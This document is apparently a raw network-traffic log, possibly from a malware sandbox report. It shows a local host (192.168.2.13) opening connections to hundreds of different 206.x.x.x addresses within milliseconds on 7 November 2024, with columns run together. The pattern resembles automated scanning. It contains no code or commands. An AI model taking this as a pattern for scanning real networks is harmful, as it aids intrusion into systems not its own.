                                          Nov 7, 2024 11:57:58.429910898 CET228880192.168.2.13206.173.106.66
                                          Nov 7, 2024 11:57:58.429927111 CET228880192.168.2.13206.214.210.251
                                          Nov 7, 2024 11:57:58.429936886 CET228880192.168.2.13206.81.189.92
                                          Nov 7, 2024 11:57:58.429965973 CET228880192.168.2.13206.28.183.32
                                          Nov 7, 2024 11:57:58.429982901 CET228880192.168.2.13206.99.110.161
                                          Nov 7, 2024 11:57:58.429991007 CET228880192.168.2.13206.29.154.143
                                          Nov 7, 2024 11:57:58.429997921 CET228880192.168.2.13206.133.129.5
                                          Nov 7, 2024 11:57:58.430007935 CET228880192.168.2.13206.196.35.200
                                          Nov 7, 2024 11:57:58.430042982 CET228880192.168.2.13206.124.255.5
                                          Nov 7, 2024 11:57:58.430054903 CET228880192.168.2.13206.20.74.61
                                          Nov 7, 2024 11:57:58.430056095 CET228880192.168.2.13206.62.9.48
                                          Nov 7, 2024 11:57:58.430056095 CET228880192.168.2.13206.238.74.66
                                          Nov 7, 2024 11:57:58.430058002 CET228880192.168.2.13206.219.136.0
                                          Nov 7, 2024 11:57:58.430069923 CET228880192.168.2.13206.136.59.192
                                          Nov 7, 2024 11:57:58.430077076 CET228880192.168.2.13206.210.243.139
                                          Nov 7, 2024 11:57:58.430085897 CET228880192.168.2.13206.9.5.198
                                          Nov 7, 2024 11:57:58.430098057 CET228880192.168.2.13206.52.50.58
                                          Nov 7, 2024 11:57:58.430130005 CET228880192.168.2.13206.207.112.18
                                          Nov 7, 2024 11:57:58.430140972 CET228880192.168.2.13206.86.71.153
                                          Nov 7, 2024 11:57:58.430157900 CET228880192.168.2.13206.169.208.30
                                          Nov 7, 2024 11:57:58.430161953 CET228880192.168.2.13206.216.76.83
                                          Nov 7, 2024 11:57:58.430167913 CET228880192.168.2.13206.173.7.114
                                          Nov 7, 2024 11:57:58.430207014 CET228880192.168.2.13206.242.226.93
                                          Nov 7, 2024 11:57:58.430226088 CET228880192.168.2.13206.122.143.18
                                          Nov 7, 2024 11:57:58.430232048 CET228880192.168.2.13206.156.60.72
                                          Nov 7, 2024 11:57:58.430233955 CET228880192.168.2.13206.186.133.128
                                          Nov 7, 2024 11:57:58.430242062 CET228880192.168.2.13206.64.149.202
                                          Nov 7, 2024 11:57:58.430289030 CET228880192.168.2.13206.194.223.185
                                          Nov 7, 2024 11:57:58.430305004 CET228880192.168.2.13206.41.57.98
                                          Nov 7, 2024 11:57:58.430319071 CET228880192.168.2.13206.50.229.179
                                          Nov 7, 2024 11:57:58.430322886 CET228880192.168.2.13206.111.182.108
                                          Nov 7, 2024 11:57:58.430335045 CET228880192.168.2.13206.215.239.167
                                          Nov 7, 2024 11:57:58.430351019 CET228880192.168.2.13206.196.149.249
                                          Nov 7, 2024 11:57:58.430381060 CET228880192.168.2.13206.169.165.155
                                          Nov 7, 2024 11:57:58.430394888 CET228880192.168.2.13206.147.240.65
                                          Nov 7, 2024 11:57:58.430394888 CET228880192.168.2.13206.124.87.210
                                          Nov 7, 2024 11:57:58.430413961 CET228880192.168.2.13206.80.105.147
                                          Nov 7, 2024 11:57:58.430425882 CET228880192.168.2.13206.124.223.193
                                          Nov 7, 2024 11:57:58.430461884 CET228880192.168.2.13206.207.160.192
                                          Nov 7, 2024 11:57:58.430465937 CET228880192.168.2.13206.251.82.108
                                          Nov 7, 2024 11:57:58.430483103 CET228880192.168.2.13206.105.69.245
                                          Nov 7, 2024 11:57:58.430481911 CET228880192.168.2.13206.19.7.166
                                          Nov 7, 2024 11:57:58.430491924 CET228880192.168.2.13206.240.51.183
                                          Nov 7, 2024 11:57:58.430495024 CET228880192.168.2.13206.251.243.255
                                          Nov 7, 2024 11:57:58.430530071 CET228880192.168.2.13206.134.24.44
                                          Nov 7, 2024 11:57:58.430547953 CET228880192.168.2.13206.90.74.148
                                          Nov 7, 2024 11:57:58.430548906 CET228880192.168.2.13206.185.77.223
                                          Nov 7, 2024 11:57:58.430567980 CET228880192.168.2.13206.17.101.13
                                          Nov 7, 2024 11:57:58.430568933 CET228880192.168.2.13206.129.203.232
                                          Nov 7, 2024 11:57:58.430576086 CET228880192.168.2.13206.194.245.25
                                          Nov 7, 2024 11:57:58.430608034 CET228880192.168.2.13206.47.19.44
                                          Nov 7, 2024 11:57:58.430624008 CET228880192.168.2.13206.45.211.38
                                          Nov 7, 2024 11:57:58.430625916 CET228880192.168.2.13206.108.218.81
                                          Nov 7, 2024 11:57:58.430634975 CET228880192.168.2.13206.213.139.79
                                          Nov 7, 2024 11:57:58.430666924 CET228880192.168.2.13206.166.75.196
                                          Nov 7, 2024 11:57:58.430670023 CET228880192.168.2.13206.249.9.160
                                          Nov 7, 2024 11:57:58.430684090 CET228880192.168.2.13206.208.0.213
                                          Nov 7, 2024 11:57:58.430684090 CET228880192.168.2.13206.155.179.80
                                          Nov 7, 2024 11:57:58.430691004 CET228880192.168.2.13206.248.127.240
                                          Nov 7, 2024 11:57:58.430706024 CET228880192.168.2.13206.224.183.85
                                          Nov 7, 2024 11:57:58.430743933 CET228880192.168.2.13206.249.72.7
                                          Nov 7, 2024 11:57:58.430752993 CET228880192.168.2.13206.95.1.192
                                          Nov 7, 2024 11:57:58.430761099 CET228880192.168.2.13206.142.11.124
                                          Nov 7, 2024 11:57:58.430778980 CET228880192.168.2.13206.80.3.121
                                          Nov 7, 2024 11:57:58.430813074 CET228880192.168.2.13206.61.51.22
                                          Nov 7, 2024 11:57:58.430813074 CET228880192.168.2.13206.196.22.116
                                          Nov 7, 2024 11:57:58.430829048 CET228880192.168.2.13206.237.104.134
                                          Nov 7, 2024 11:57:58.430835962 CET228880192.168.2.13206.50.96.228
                                          Nov 7, 2024 11:57:58.430845976 CET228880192.168.2.13206.80.228.232
                                          Nov 7, 2024 11:57:58.430882931 CET228880192.168.2.13206.82.5.157
                                          Nov 7, 2024 11:57:58.430893898 CET228880192.168.2.13206.81.204.119
                                          Nov 7, 2024 11:57:58.430896044 CET228880192.168.2.13206.96.123.35
                                          Nov 7, 2024 11:57:58.430907965 CET228880192.168.2.13206.10.113.149
                                          Nov 7, 2024 11:57:58.430916071 CET228880192.168.2.13206.168.156.12
                                          Nov 7, 2024 11:57:58.430958986 CET228880192.168.2.13206.110.122.145
                                          Nov 7, 2024 11:57:58.430979013 CET228880192.168.2.13206.59.98.189
                                          Nov 7, 2024 11:57:58.430979967 CET228880192.168.2.13206.129.168.250
                                          Nov 7, 2024 11:57:58.430993080 CET228880192.168.2.13206.30.125.198
                                          Nov 7, 2024 11:57:58.430994034 CET228880192.168.2.13206.222.182.113
                                          Nov 7, 2024 11:57:58.431025982 CET228880192.168.2.13206.4.76.36
                                          Nov 7, 2024 11:57:58.431036949 CET228880192.168.2.13206.123.33.12
                                          Nov 7, 2024 11:57:58.431054115 CET228880192.168.2.13206.164.230.127
                                          Nov 7, 2024 11:57:58.431054115 CET228880192.168.2.13206.74.77.91
                                          Nov 7, 2024 11:57:58.431056976 CET228880192.168.2.13206.171.25.96
                                          Nov 7, 2024 11:57:58.431101084 CET228880192.168.2.13206.202.27.186
                                          Nov 7, 2024 11:57:58.431107998 CET228880192.168.2.13206.157.1.176
                                          Nov 7, 2024 11:57:58.431123972 CET228880192.168.2.13206.177.15.242
                                          Nov 7, 2024 11:57:58.431126118 CET228880192.168.2.13206.126.161.4
                                          Nov 7, 2024 11:57:58.431143045 CET228880192.168.2.13206.44.142.8
                                          Nov 7, 2024 11:57:58.431152105 CET228880192.168.2.13206.32.16.34
                                          Nov 7, 2024 11:57:58.431190014 CET228880192.168.2.13206.39.100.233
                                          Nov 7, 2024 11:57:58.431196928 CET228880192.168.2.13206.156.18.61
                                          Nov 7, 2024 11:57:58.431216955 CET228880192.168.2.13206.211.3.226
                                          Nov 7, 2024 11:57:58.431216955 CET228880192.168.2.13206.196.85.242
                                          Nov 7, 2024 11:57:58.431231022 CET228880192.168.2.13206.72.217.182
                                          Nov 7, 2024 11:57:58.431277037 CET228880192.168.2.13206.171.223.219
                                          Nov 7, 2024 11:57:58.431282997 CET228880192.168.2.13206.167.242.12
                                          Nov 7, 2024 11:57:58.431298018 CET228880192.168.2.13206.249.67.20
                                          Nov 7, 2024 11:57:58.431301117 CET228880192.168.2.13206.100.206.82
                                          Nov 7, 2024 11:57:58.431350946 CET228880192.168.2.13206.34.87.91
                                          Nov 7, 2024 11:57:58.431350946 CET228880192.168.2.13206.59.224.101
                                          Nov 7, 2024 11:57:58.431368113 CET228880192.168.2.13206.89.234.61
                                          Nov 7, 2024 11:57:58.431370020 CET228880192.168.2.13206.58.111.86
                                          Nov 7, 2024 11:57:58.431375027 CET228880192.168.2.13206.236.219.206
                                          Nov 7, 2024 11:57:58.431385040 CET228880192.168.2.13206.254.48.220
                                          Nov 7, 2024 11:57:58.431385994 CET228880192.168.2.13206.131.195.68
                                          Nov 7, 2024 11:57:58.431401014 CET228880192.168.2.13206.103.8.200
                                          Nov 7, 2024 11:57:58.431440115 CET228880192.168.2.13206.53.6.226
                                          Nov 7, 2024 11:57:58.431441069 CET228880192.168.2.13206.38.19.167
                                          Nov 7, 2024 11:57:58.431456089 CET228880192.168.2.13206.200.84.67
                                          Nov 7, 2024 11:57:58.431462049 CET228880192.168.2.13206.92.108.37
                                          Nov 7, 2024 11:57:58.431472063 CET228880192.168.2.13206.97.115.243
                                          Nov 7, 2024 11:57:58.431480885 CET228880192.168.2.13206.61.94.240
                                          Nov 7, 2024 11:57:58.431507111 CET228880192.168.2.13206.1.244.184
                                          Nov 7, 2024 11:57:58.431529045 CET228880192.168.2.13206.171.115.85
                                          Nov 7, 2024 11:57:58.431531906 CET228880192.168.2.13206.111.211.132
                                          Nov 7, 2024 11:57:58.431555986 CET228880192.168.2.13206.252.91.223
                                          Nov 7, 2024 11:57:58.431556940 CET228880192.168.2.13206.252.229.211
                                          Nov 7, 2024 11:57:58.431560040 CET228880192.168.2.13206.121.57.69
                                          Nov 7, 2024 11:57:58.431564093 CET228880192.168.2.13206.198.156.167
                                          Nov 7, 2024 11:57:58.431610107 CET228880192.168.2.13206.191.160.187
                                          Nov 7, 2024 11:57:58.431615114 CET228880192.168.2.13206.58.153.71
                                          Nov 7, 2024 11:57:58.431629896 CET228880192.168.2.13206.188.98.61
                                          Nov 7, 2024 11:57:58.431632996 CET228880192.168.2.13206.11.53.35
                                          Nov 7, 2024 11:57:58.431651115 CET228880192.168.2.13206.87.34.50
                                          Nov 7, 2024 11:57:58.431651115 CET228880192.168.2.13206.222.100.188
                                          Nov 7, 2024 11:57:58.431658983 CET228880192.168.2.13206.164.144.107
                                          Nov 7, 2024 11:57:58.431696892 CET228880192.168.2.13206.62.7.220
                                          Nov 7, 2024 11:57:58.431700945 CET228880192.168.2.13206.137.198.22
                                          Nov 7, 2024 11:57:58.431723118 CET228880192.168.2.13206.246.129.202
                                          Nov 7, 2024 11:57:58.431730986 CET228880192.168.2.13206.104.220.253
                                          Nov 7, 2024 11:57:58.431736946 CET228880192.168.2.13206.73.49.186
                                          Nov 7, 2024 11:57:58.431776047 CET228880192.168.2.13206.95.139.252
                                          Nov 7, 2024 11:57:58.431794882 CET228880192.168.2.13206.254.71.198
                                          Nov 7, 2024 11:57:58.431794882 CET228880192.168.2.13206.51.22.138
                                          Nov 7, 2024 11:57:58.431807041 CET228880192.168.2.13206.100.210.231
                                          Nov 7, 2024 11:57:58.431816101 CET228880192.168.2.13206.219.134.219
                                          Nov 7, 2024 11:57:58.431822062 CET228880192.168.2.13206.221.146.116
                                          Nov 7, 2024 11:57:58.431860924 CET228880192.168.2.13206.67.248.198
                                          Nov 7, 2024 11:57:58.431868076 CET228880192.168.2.13206.237.13.175
                                          Nov 7, 2024 11:57:58.431886911 CET228880192.168.2.13206.122.138.225
                                          Nov 7, 2024 11:57:58.431889057 CET228880192.168.2.13206.90.198.199
                                          Nov 7, 2024 11:57:58.431893110 CET228880192.168.2.13206.187.252.193
                                          Nov 7, 2024 11:57:58.431921005 CET228880192.168.2.13206.213.117.37
                                          Nov 7, 2024 11:57:58.431936979 CET228880192.168.2.13206.158.158.241
                                          Nov 7, 2024 11:57:58.431953907 CET228880192.168.2.13206.198.32.13
                                          Nov 7, 2024 11:57:58.431953907 CET228880192.168.2.13206.12.232.14
                                          Nov 7, 2024 11:57:58.431973934 CET228880192.168.2.13206.120.69.17
                                          Nov 7, 2024 11:57:58.432012081 CET228880192.168.2.13206.59.187.111
                                          Nov 7, 2024 11:57:58.432022095 CET228880192.168.2.13206.43.217.189
                                          Nov 7, 2024 11:57:58.432029963 CET228880192.168.2.13206.96.228.202
                                          Nov 7, 2024 11:57:58.432039022 CET228880192.168.2.13206.243.50.20
                                          Nov 7, 2024 11:57:58.432054996 CET228880192.168.2.13206.44.198.30
                                          Nov 7, 2024 11:57:58.432054996 CET228880192.168.2.13206.254.155.228
                                          Nov 7, 2024 11:57:58.432113886 CET228880192.168.2.13206.99.199.98
                                          Nov 7, 2024 11:57:58.432116985 CET228880192.168.2.13206.165.57.213
                                          Nov 7, 2024 11:57:58.432116985 CET228880192.168.2.13206.144.207.186
                                          Nov 7, 2024 11:57:58.432132959 CET228880192.168.2.13206.21.120.70
                                          Nov 7, 2024 11:57:58.432132959 CET228880192.168.2.13206.244.61.33
                                          Nov 7, 2024 11:57:58.432173967 CET228880192.168.2.13206.187.128.173
                                          Nov 7, 2024 11:57:58.432177067 CET228880192.168.2.13206.134.192.232
                                          Nov 7, 2024 11:57:58.432198048 CET228880192.168.2.13206.41.74.172
                                          Nov 7, 2024 11:57:58.432199001 CET228880192.168.2.13206.103.165.199
                                          Nov 7, 2024 11:57:58.432213068 CET228880192.168.2.13206.226.167.180
                                          Nov 7, 2024 11:57:58.432252884 CET228880192.168.2.13206.27.128.170
                                          Nov 7, 2024 11:57:58.432252884 CET228880192.168.2.13206.218.89.246
                                          Nov 7, 2024 11:57:58.432269096 CET228880192.168.2.13206.26.236.199
                                          Nov 7, 2024 11:57:58.432315111 CET228880192.168.2.13206.219.212.131
                                          Nov 7, 2024 11:57:58.432317019 CET228880192.168.2.13206.212.235.174
                                          Nov 7, 2024 11:57:58.432324886 CET228880192.168.2.13206.132.223.22
                                          Nov 7, 2024 11:57:58.432327032 CET228880192.168.2.13206.188.46.110
                                          Nov 7, 2024 11:57:58.432341099 CET228880192.168.2.13206.114.161.116
                                          Nov 7, 2024 11:57:58.432347059 CET228880192.168.2.13206.145.150.40
                                          Nov 7, 2024 11:57:58.432384968 CET228880192.168.2.13206.11.128.91
                                          Nov 7, 2024 11:57:58.432408094 CET228880192.168.2.13206.137.195.203
                                          Nov 7, 2024 11:57:58.432415009 CET228880192.168.2.13206.56.222.116
                                          Nov 7, 2024 11:57:58.432429075 CET228880192.168.2.13206.216.191.243
                                          Nov 7, 2024 11:57:58.432466984 CET228880192.168.2.13206.36.116.37
                                          Nov 7, 2024 11:57:58.432467937 CET228880192.168.2.13206.0.168.21
                                          Nov 7, 2024 11:57:58.432486057 CET228880192.168.2.13206.247.46.200
                                          Nov 7, 2024 11:57:58.432532072 CET228880192.168.2.13206.129.32.107
                                          Nov 7, 2024 11:57:58.432538033 CET228880192.168.2.13206.13.122.75
                                          Nov 7, 2024 11:57:58.432545900 CET228880192.168.2.13206.236.248.132
                                          Nov 7, 2024 11:57:58.432545900 CET228880192.168.2.13206.121.76.202
                                          Nov 7, 2024 11:57:58.432563066 CET228880192.168.2.13206.231.57.203
                                          Nov 7, 2024 11:57:58.432571888 CET228880192.168.2.13206.81.10.60
                                          Nov 7, 2024 11:57:58.432610035 CET228880192.168.2.13206.78.179.140
                                          Nov 7, 2024 11:57:58.432611942 CET228880192.168.2.13206.222.81.79
                                          Nov 7, 2024 11:57:58.432630062 CET228880192.168.2.13206.116.77.101
                                          Nov 7, 2024 11:57:58.432632923 CET228880192.168.2.13206.148.159.77
                                          Nov 7, 2024 11:57:58.432647943 CET228880192.168.2.13206.54.169.228
                                          Nov 7, 2024 11:57:58.432677031 CET228880192.168.2.13206.109.57.7
                                          Nov 7, 2024 11:57:58.432687998 CET228880192.168.2.13206.197.41.4
                                          Nov 7, 2024 11:57:58.432698011 CET228880192.168.2.13206.65.33.254
                                          Nov 7, 2024 11:57:58.432698965 CET228880192.168.2.13206.44.201.225
                                          Nov 7, 2024 11:57:58.432710886 CET228880192.168.2.13206.50.151.235
                                          Nov 7, 2024 11:57:58.432713032 CET228880192.168.2.13206.91.154.193
                                          Nov 7, 2024 11:57:58.432756901 CET228880192.168.2.13206.103.213.81
                                          Nov 7, 2024 11:57:58.432771921 CET228880192.168.2.13206.217.32.125
                                          Nov 7, 2024 11:57:58.432781935 CET228880192.168.2.13206.43.36.174
                                          Nov 7, 2024 11:57:58.432790041 CET228880192.168.2.13206.162.188.182
                                          Nov 7, 2024 11:57:58.432792902 CET228880192.168.2.13206.214.28.90
                                          Nov 7, 2024 11:57:58.432801962 CET228880192.168.2.13206.227.54.149
                                          Nov 7, 2024 11:57:58.432804108 CET228880192.168.2.13206.98.4.226
                                          Nov 7, 2024 11:57:58.432809114 CET228880192.168.2.13206.111.74.36
                                          Nov 7, 2024 11:57:58.432847977 CET228880192.168.2.13206.101.84.217
                                          Nov 7, 2024 11:57:58.432853937 CET228880192.168.2.13206.132.4.85
                                          Nov 7, 2024 11:57:58.432871103 CET228880192.168.2.13206.143.152.23
                                          Nov 7, 2024 11:57:58.432876110 CET228880192.168.2.13206.228.0.67
                                          Nov 7, 2024 11:57:58.432892084 CET228880192.168.2.13206.192.234.58
                                          Nov 7, 2024 11:57:58.432894945 CET228880192.168.2.13206.74.213.202
                                          Nov 7, 2024 11:57:58.432934046 CET228880192.168.2.13206.48.187.136
                                          Nov 7, 2024 11:57:58.432940006 CET228880192.168.2.13206.132.20.214
                                          Nov 7, 2024 11:57:58.432945967 CET228880192.168.2.13206.163.189.151
                                          Nov 7, 2024 11:57:58.432960987 CET228880192.168.2.13206.229.26.200
                                          Nov 7, 2024 11:57:58.432960987 CET228880192.168.2.13206.93.46.200
                                          Nov 7, 2024 11:57:58.433002949 CET228880192.168.2.13206.194.145.188
                                          Nov 7, 2024 11:57:58.433028936 CET228880192.168.2.13206.187.90.62
                                          Nov 7, 2024 11:57:58.433029890 CET228880192.168.2.13206.52.11.116
                                          Nov 7, 2024 11:57:58.433032990 CET228880192.168.2.13206.72.139.19
                                          Nov 7, 2024 11:57:58.433046103 CET228880192.168.2.13206.161.153.148
                                          Nov 7, 2024 11:57:58.433077097 CET228880192.168.2.13206.87.107.211
                                          Nov 7, 2024 11:57:58.433093071 CET228880192.168.2.13206.186.116.217
                                          Nov 7, 2024 11:57:58.433101892 CET228880192.168.2.13206.193.202.127
                                          Nov 7, 2024 11:57:58.433116913 CET228880192.168.2.13206.165.159.82
                                          Nov 7, 2024 11:57:58.433124065 CET228880192.168.2.13206.183.12.47
                                          Nov 7, 2024 11:57:58.433171034 CET228880192.168.2.13206.10.241.202
                                          Nov 7, 2024 11:57:58.433175087 CET228880192.168.2.13206.55.243.153
                                          Nov 7, 2024 11:57:58.433180094 CET228880192.168.2.13206.119.101.186
                                          Nov 7, 2024 11:57:58.433192968 CET228880192.168.2.13206.170.188.2
                                          Nov 7, 2024 11:57:58.433231115 CET228880192.168.2.13206.99.183.98
                                          Nov 7, 2024 11:57:58.433231115 CET228880192.168.2.13206.58.147.35
                                          Nov 7, 2024 11:57:58.433249950 CET228880192.168.2.13206.77.76.108
                                          Nov 7, 2024 11:57:58.433252096 CET228880192.168.2.13206.33.75.209
                                          Nov 7, 2024 11:57:58.433259010 CET228880192.168.2.13206.185.190.27
                                          Nov 7, 2024 11:57:58.433259964 CET228880192.168.2.13206.90.41.99
                                          Nov 7, 2024 11:57:58.433284044 CET228880192.168.2.13206.21.163.235
                                          Nov 7, 2024 11:57:58.433286905 CET228880192.168.2.13206.55.51.155
                                          Nov 7, 2024 11:57:58.433286905 CET228880192.168.2.13206.43.27.201
                                          Nov 7, 2024 11:57:58.433351040 CET228880192.168.2.13206.54.255.96
                                          Nov 7, 2024 11:57:58.433357000 CET228880192.168.2.13206.37.83.25
                                          Nov 7, 2024 11:57:58.433357954 CET228880192.168.2.13206.57.123.28
                                          Nov 7, 2024 11:57:58.433367014 CET228880192.168.2.13206.20.235.145
                                          Nov 7, 2024 11:57:58.433368921 CET228880192.168.2.13206.200.27.145
                                          Nov 7, 2024 11:57:58.433410883 CET228880192.168.2.13206.167.26.201
                                          Nov 7, 2024 11:57:58.433417082 CET228880192.168.2.13206.193.216.138
                                          Nov 7, 2024 11:57:58.433422089 CET228880192.168.2.13206.229.121.112
                                          Nov 7, 2024 11:57:58.433437109 CET228880192.168.2.13206.165.93.131
                                          Nov 7, 2024 11:57:58.433471918 CET228880192.168.2.13206.44.202.103
                                          Nov 7, 2024 11:57:58.433482885 CET228880192.168.2.13206.51.123.209
                                          Nov 7, 2024 11:57:58.433485985 CET228880192.168.2.13206.4.32.5
                                          Nov 7, 2024 11:57:58.433505058 CET228880192.168.2.13206.97.189.103
                                          Nov 7, 2024 11:57:58.433506966 CET228880192.168.2.13206.190.177.182
                                          Nov 7, 2024 11:57:58.433521986 CET228880192.168.2.13206.187.127.53
                                          Nov 7, 2024 11:57:58.433523893 CET228880192.168.2.13206.85.21.53
                                          Nov 7, 2024 11:57:58.433532000 CET228880192.168.2.13206.202.48.197
                                          Nov 7, 2024 11:57:58.433568954 CET228880192.168.2.13206.36.209.178
                                          Nov 7, 2024 11:57:58.433597088 CET228880192.168.2.13206.53.120.213
                                          Nov 7, 2024 11:57:58.433597088 CET228880192.168.2.13206.17.38.51
                                          Nov 7, 2024 11:57:58.433598042 CET228880192.168.2.13206.216.35.156
                                          Nov 7, 2024 11:57:58.433609962 CET228880192.168.2.13206.229.17.184
                                          Nov 7, 2024 11:57:58.433646917 CET228880192.168.2.13206.175.188.237
                                          Nov 7, 2024 11:57:58.433661938 CET228880192.168.2.13206.147.242.68
                                          Nov 7, 2024 11:57:58.433667898 CET228880192.168.2.13206.191.21.98
                                          Nov 7, 2024 11:57:58.433685064 CET228880192.168.2.13206.26.142.12
                                          Nov 7, 2024 11:57:58.433691978 CET228880192.168.2.13206.42.30.126
                                          Nov 7, 2024 11:57:58.433727026 CET228880192.168.2.13206.201.115.117
                                          Nov 7, 2024 11:57:58.433741093 CET228880192.168.2.13206.123.104.146
                                          Nov 7, 2024 11:57:58.433743000 CET228880192.168.2.13206.140.205.213
                                          Nov 7, 2024 11:57:58.433753014 CET228880192.168.2.13206.253.180.72
                                          Nov 7, 2024 11:57:58.433757067 CET228880192.168.2.13206.20.160.10
                                          Nov 7, 2024 11:57:58.433774948 CET228880192.168.2.13206.39.47.197
                                          Nov 7, 2024 11:57:58.433788061 CET228880192.168.2.13206.118.105.188
                                          Nov 7, 2024 11:57:58.433789015 CET228880192.168.2.13206.165.86.193
                                          Nov 7, 2024 11:57:58.433809996 CET228880192.168.2.13206.83.28.231
                                          Nov 7, 2024 11:57:58.433809996 CET228880192.168.2.13206.59.173.38
                                          Nov 7, 2024 11:57:58.433823109 CET228880192.168.2.13206.142.159.204
                                          Nov 7, 2024 11:57:58.433824062 CET228880192.168.2.13206.247.1.184
                                          Nov 7, 2024 11:57:58.433854103 CET228880192.168.2.13206.55.38.139
                                          Nov 7, 2024 11:57:58.433856010 CET228880192.168.2.13206.174.246.85
                                          Nov 7, 2024 11:57:58.433870077 CET228880192.168.2.13206.9.186.58
                                          Nov 7, 2024 11:57:58.433887959 CET228880192.168.2.13206.157.100.230
                                          Nov 7, 2024 11:57:58.433888912 CET228880192.168.2.13206.71.84.139
                                          Nov 7, 2024 11:57:58.433887959 CET228880192.168.2.13206.62.124.70
                                          Nov 7, 2024 11:57:58.433896065 CET228880192.168.2.13206.111.133.213
                                          Nov 7, 2024 11:57:58.433902025 CET228880192.168.2.13206.203.4.231
                                          Nov 7, 2024 11:57:58.433914900 CET228880192.168.2.13206.205.103.209
                                          Nov 7, 2024 11:57:58.433914900 CET228880192.168.2.13206.122.39.3
                                          Nov 7, 2024 11:57:58.433923960 CET228880192.168.2.13206.125.186.215
                                          Nov 7, 2024 11:57:58.433964968 CET228880192.168.2.13206.235.54.224
                                          Nov 7, 2024 11:57:58.433969021 CET228880192.168.2.13206.243.145.55
                                          Nov 7, 2024 11:57:58.433980942 CET228880192.168.2.13206.62.169.126
                                          Nov 7, 2024 11:57:58.433985949 CET228880192.168.2.13206.4.130.239
                                          Nov 7, 2024 11:57:58.434001923 CET228880192.168.2.13206.92.230.78
                                          Nov 7, 2024 11:57:58.434035063 CET228880192.168.2.13206.46.32.123
                                          Nov 7, 2024 11:57:58.434050083 CET228880192.168.2.13206.54.10.30
                                          Nov 7, 2024 11:57:58.434051037 CET228880192.168.2.13206.49.241.1
                                          Nov 7, 2024 11:57:58.434056997 CET228880192.168.2.13206.37.149.171
                                          Nov 7, 2024 11:57:58.434062958 CET228880192.168.2.13206.111.92.165
                                          Nov 7, 2024 11:57:58.434106112 CET228880192.168.2.13206.83.143.86
                                          Nov 7, 2024 11:57:58.434109926 CET228880192.168.2.13206.169.208.86
                                          Nov 7, 2024 11:57:58.434123993 CET228880192.168.2.13206.44.68.151
                                          Nov 7, 2024 11:57:58.434125900 CET228880192.168.2.13206.181.249.226
                                          Nov 7, 2024 11:57:58.434139013 CET228880192.168.2.13206.186.109.2
                                          Nov 7, 2024 11:57:58.434144974 CET228880192.168.2.13206.175.144.177
                                          Nov 7, 2024 11:57:58.434190989 CET228880192.168.2.13206.63.140.88
                                          Nov 7, 2024 11:57:58.434205055 CET228880192.168.2.13206.77.209.157
                                          Nov 7, 2024 11:57:58.434206009 CET228880192.168.2.13206.232.174.185
                                          Nov 7, 2024 11:57:58.434205055 CET228880192.168.2.13206.32.117.85
                                          Nov 7, 2024 11:57:58.434211016 CET228880192.168.2.13206.47.183.4
                                          Nov 7, 2024 11:57:58.434221029 CET228880192.168.2.13206.233.220.122
                                          Nov 7, 2024 11:57:58.434266090 CET228880192.168.2.13206.113.223.48
                                          Nov 7, 2024 11:57:58.434267044 CET228880192.168.2.13206.248.15.185
                                          Nov 7, 2024 11:57:58.434284925 CET228880192.168.2.13206.194.194.35
                                          Nov 7, 2024 11:57:58.434292078 CET228880192.168.2.13206.77.159.194
                                          Nov 7, 2024 11:57:58.434343100 CET228880192.168.2.13206.38.67.65
                                          Nov 7, 2024 11:57:58.434345007 CET228880192.168.2.13206.8.207.78
                                          Nov 7, 2024 11:57:58.434356928 CET228880192.168.2.13206.134.215.124
                                          Nov 7, 2024 11:57:58.434370995 CET228880192.168.2.13206.6.121.0
                                          Nov 7, 2024 11:57:58.434407949 CET228880192.168.2.13206.29.93.62
                                          Nov 7, 2024 11:57:58.434432983 CET228880192.168.2.13206.80.188.216
                                          Nov 7, 2024 11:57:58.434436083 CET228880192.168.2.13206.98.126.22
                                          Nov 7, 2024 11:57:58.434437037 CET228880192.168.2.13206.152.16.241
                                          Nov 7, 2024 11:57:58.434449911 CET228880192.168.2.13206.251.20.30
                                          Nov 7, 2024 11:57:58.434484005 CET228880192.168.2.13206.37.7.90
                                          Nov 7, 2024 11:57:58.434484959 CET228880192.168.2.13206.143.169.197
                                          Nov 7, 2024 11:57:58.434499025 CET228880192.168.2.13206.114.36.216
                                          Nov 7, 2024 11:57:58.434508085 CET228880192.168.2.13206.244.66.211
                                          Nov 7, 2024 11:57:58.434521914 CET228880192.168.2.13206.23.231.215
                                          Nov 7, 2024 11:57:58.434524059 CET228880192.168.2.13206.229.26.188
                                          Nov 7, 2024 11:57:58.434580088 CET228880192.168.2.13206.105.143.19
                                          Nov 7, 2024 11:57:58.434583902 CET228880192.168.2.13206.10.18.255
                                          Nov 7, 2024 11:57:58.434590101 CET228880192.168.2.13206.44.100.4
                                          Nov 7, 2024 11:57:58.434592009 CET228880192.168.2.13206.204.243.143
                                          Nov 7, 2024 11:57:58.434602022 CET228880192.168.2.13206.180.10.16
                                          Nov 7, 2024 11:57:58.434608936 CET228880192.168.2.13206.244.137.10
                                          Nov 7, 2024 11:57:58.434621096 CET228880192.168.2.13206.43.183.20
                                          Nov 7, 2024 11:57:58.434621096 CET228880192.168.2.13206.139.20.63
                                          Nov 7, 2024 11:57:58.434633970 CET228880192.168.2.13206.5.162.57
                                          Nov 7, 2024 11:57:58.434667110 CET228880192.168.2.13206.235.120.16
                                          Nov 7, 2024 11:57:58.434688091 CET228880192.168.2.13206.65.180.138
                                          Nov 7, 2024 11:57:58.434696913 CET228880192.168.2.13206.8.241.190
                                          Nov 7, 2024 11:57:58.434696913 CET228880192.168.2.13206.214.252.141
                                          Nov 7, 2024 11:57:58.434712887 CET228880192.168.2.13206.162.84.196
                                          Nov 7, 2024 11:57:58.434716940 CET228880192.168.2.13206.237.128.74
                                          Nov 7, 2024 11:57:58.434725046 CET228880192.168.2.13206.89.182.114
                                          Nov 7, 2024 11:57:58.434763908 CET228880192.168.2.13206.62.49.31
                                          Nov 7, 2024 11:57:58.434781075 CET228880192.168.2.13206.127.124.102
                                          Nov 7, 2024 11:57:58.434793949 CET228880192.168.2.13206.94.18.45
                                          Nov 7, 2024 11:57:58.434793949 CET228880192.168.2.13206.130.108.6
                                          Nov 7, 2024 11:57:58.434798002 CET228880192.168.2.13206.98.129.47
                                          Nov 7, 2024 11:57:58.434814930 CET228880192.168.2.13206.222.212.162
                                          Nov 7, 2024 11:57:58.434848070 CET228880192.168.2.13206.238.83.55
                                          Nov 7, 2024 11:57:58.434848070 CET228880192.168.2.13206.131.163.103
                                          Nov 7, 2024 11:57:58.434860945 CET228880192.168.2.13206.135.223.253
                                          Nov 7, 2024 11:57:58.434865952 CET228880192.168.2.13206.152.137.253
                                          Nov 7, 2024 11:57:58.434870958 CET228880192.168.2.13206.153.216.27
